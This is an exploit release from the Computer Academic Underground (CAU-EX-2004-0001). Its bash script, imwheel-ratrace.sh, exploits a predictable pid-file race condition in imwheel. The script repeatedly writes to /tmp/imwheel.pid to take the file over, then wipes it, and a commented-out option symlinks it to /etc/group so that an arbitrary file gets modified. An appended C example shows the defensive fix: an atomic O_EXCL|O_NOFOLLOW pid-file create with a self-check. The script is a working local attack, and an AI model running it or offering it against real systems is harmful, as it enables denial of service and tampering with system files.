Computer Academic Underground
http://www.caughq.org
Exploit Code
===============/========================================================
Exploit ID:     CAU-EX-2004-0001
Release Date:   2004.06.24
Title:          imwheel-ratrace.sh
Description:    imwheel Predictable PidFile Takeover
Tested:         imwheel 1.0.0pre11
Attributes:     Denial of Service, Resource Exhaustion, Arbitrary File Modification
Exploit URL:    http://www.caughq.org/exploits/CAU-EX-2004-0001.txt
Author/Email:   I)ruid
===============/========================================================

Description
===========

This exploit continually attempts to write $CHARCOUNT characters to
imwheel's known pid filename. When imwheel removes the file and the
write succeeds, the script has taken control of the pid file. It then
waits for imwheel to write its pid to the file and wipes the file's
contents, and can optionally replace the pid file with a symlink to an
arbitrary file.

References
==========

http://www.caughq.org/advisories/CAU-2004-0002.txt
IMWheel - http://imwheel.sourceforge.net/

Exploit
=======

#!/bin/bash
#
# imwheel-ratrace.sh - I)ruid [CAU] (06.2004)
#
# Exploits a race condition in imwheel's use of a pid file to
# cause resource exhaustion or write information to an arbitrary
# file.
#
# You may have to adjust the number of characters in the print to
# get the timing correct for the injection. Fewer characters seems
# to prevent this from working. Optionally, replacing the echo
# with the symlink creation at the end of this script seems to work
# fairly regularly.

CHARCOUNT=4000

echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/imwheel.pid
while [[ $? != 0 ]]; do
  echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/imwheel.pid
done

# Wait for imwheel to write its pid to the new file
sleep 1

# Wipe the contents of the PID file.
echo > /tmp/imwheel.pid

# Optionally, replace the new file with a link
# rm /tmp/imwheel.pid
# ln -s /etc/group /tmp/imwheel.pid

echo "Exploit Successful!!!"
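The daemon-side fix for the race described above, as an added example that is not the advisory's or imwheel's own code: create the pid file atomically and refuse anything another user already planted at that name. It assumes a POSIX/Linux system; the scratch path and the self-check routine are constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create `path` and write `pid` to it without ever opening something that
 * another user planted at that name.  Returns 0, or -1 with errno set.
 * O_CREAT|O_EXCL makes the create atomic: an existing file OR symlink (the
 * echo loop and the ln -s above) fails with EEXIST instead of being followed,
 * and fstat checks the fd we hold, not the name.  Better still, keep pid
 * files out of world-writable /tmp (e.g. use $XDG_RUNTIME_DIR). */
int write_pidfile_safely(const char *path, pid_t pid)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;                  /* EEXIST: name already taken */
    struct stat st;
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%ld\n", (long)pid);
    int ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode) &&
             st.st_nlink == 1 && st.st_uid == geteuid();
    if (!ok) errno = EPERM;
    if (!ok || write(fd, buf, (size_t)n) != n) {
        int saved = errno;
        close(fd);
        unlink(path);                       /* we created it, so we remove it */
        errno = saved;
        return -1;
    }
    return close(fd);
}

/* Self-check on a constructed scratch path: 0 if a fresh name is accepted and
 * both an existing file and a pre-planted symlink are refused with EEXIST. */
int pidfile_selfcheck(void)
{
    char path[] = "/tmp/pidfile-demo.XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return 1;
    close(fd); unlink(path);                /* keep the unique name, free the path */
    if (write_pidfile_safely(path, getpid()) != 0) return 2;
    if (write_pidfile_safely(path, getpid()) == 0 || errno != EEXIST) return 3;
    unlink(path);
    if (symlink("/etc/group", path) != 0) return 4;
    if (write_pidfile_safely(path, getpid()) == 0 || errno != EEXIST) return 5;
    unlink(path);
    return 0;
}
```

On Linux, fs.protected_symlinks=1 on a sticky /tmp adds a second, kernel-level block on the symlink variant, but it does not stop another user from pre-creating a plain file at the predictable name, which is why the O_EXCL create is still needed.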